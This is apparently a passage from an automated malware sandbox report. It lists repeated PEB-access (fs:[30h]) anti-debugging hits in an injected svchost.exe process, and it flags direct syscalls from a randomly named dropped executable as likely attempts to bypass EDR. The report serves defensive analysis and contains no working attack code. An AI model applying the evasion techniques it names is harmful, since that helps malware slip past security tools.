            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C427 mov eax, dword ptr fs:[00000030h]1_2_0382C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA456 mov eax, dword ptr fs:[00000030h]1_2_038EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382645D mov eax, dword ptr fs:[00000030h]1_2_0382645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385245A mov eax, dword ptr fs:[00000030h]1_2_0385245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC460 mov ecx, dword ptr fs:[00000030h]1_2_038BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEBD0 mov eax, dword ptr fs:[00000030h]1_2_038DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EBFC mov eax, dword ptr fs:[00000030h]1_2_0385EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCBF0 mov eax, dword ptr fs:[00000030h]1_2_038BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904B00 mov eax, dword ptr fs:[00000030h]1_2_03904B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB40 mov eax, dword ptr fs:[00000030h]1_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8B42 mov eax, dword ptr fs:[00000030h]1_2_038D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828B50 mov eax, dword ptr fs:[00000030h]1_2_03828B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEB50 mov eax, dword ptr fs:[00000030h]1_2_038DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382CB7E mov eax, dword ptr fs:[00000030h]1_2_0382CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904A80 mov eax, dword ptr fs:[00000030h]1_2_03904A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868A90 mov edx, dword ptr fs:[00000030h]1_2_03868A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886AA4 mov eax, dword ptr fs:[00000030h]1_2_03886AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830AD0 mov eax, dword ptr fs:[00000030h]1_2_03830AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCA11 mov eax, dword ptr fs:[00000030h]1_2_038BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA24 mov eax, dword ptr fs:[00000030h]1_2_0386CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EA2E mov eax, dword ptr fs:[00000030h]1_2_0385EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03854A35 mov eax, dword ptr fs:[00000030h]1_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836A50 mov eax, dword ptr fs:[00000030h]1_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840A5B mov eax, dword ptr fs:[00000030h]1_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386CA6F mov eax, dword ptr fs:[00000030h]1_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEA60 mov eax, dword ptr fs:[00000030h]1_2_038DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]1_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038ACA72 mov eax, dword ptr fs:[00000030h]1_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A0 mov eax, dword ptr fs:[00000030h]1_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]1_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038309AD mov eax, dword ptr fs:[00000030h]1_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov esi, dword ptr fs:[00000030h]1_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]1_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B89B3 mov eax, dword ptr fs:[00000030h]1_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C69C0 mov eax, dword ptr fs:[00000030h]1_2_038C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A9D0 mov eax, dword ptr fs:[00000030h]1_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038649D0 mov eax, dword ptr fs:[00000030h]1_2_038649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA9D3 mov eax, dword ptr fs:[00000030h]1_2_038FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE9E0 mov eax, dword ptr fs:[00000030h]1_2_038BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]1_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038629F9 mov eax, dword ptr fs:[00000030h]1_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]1_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE908 mov eax, dword ptr fs:[00000030h]1_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC912 mov eax, dword ptr fs:[00000030h]1_2_038BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]1_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828918 mov eax, dword ptr fs:[00000030h]1_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B892A mov eax, dword ptr fs:[00000030h]1_2_038B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C892B mov eax, dword ptr fs:[00000030h]1_2_038C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0946 mov eax, dword ptr fs:[00000030h]1_2_038B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904940 mov eax, dword ptr fs:[00000030h]1_2_03904940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov edx, dword ptr fs:[00000030h]1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]1_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]1_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC97C mov eax, dword ptr fs:[00000030h]1_2_038BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830887 mov eax, dword ptr fs:[00000030h]1_2_03830887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC89D mov eax, dword ptr fs:[00000030h]1_2_038BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E8C0 mov eax, dword ptr fs:[00000030h]1_2_0385E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039008C0 mov eax, dword ptr fs:[00000030h]1_2_039008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA8E4 mov eax, dword ptr fs:[00000030h]1_2_038FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]1_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]1_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC810 mov eax, dword ptr fs:[00000030h]1_2_038BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov ecx, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E481F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E481F7
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E1A395
            Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exeCode function: 0_2_00E1A364 SetUnhandledExceptionFilter,0_2_00E1A364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
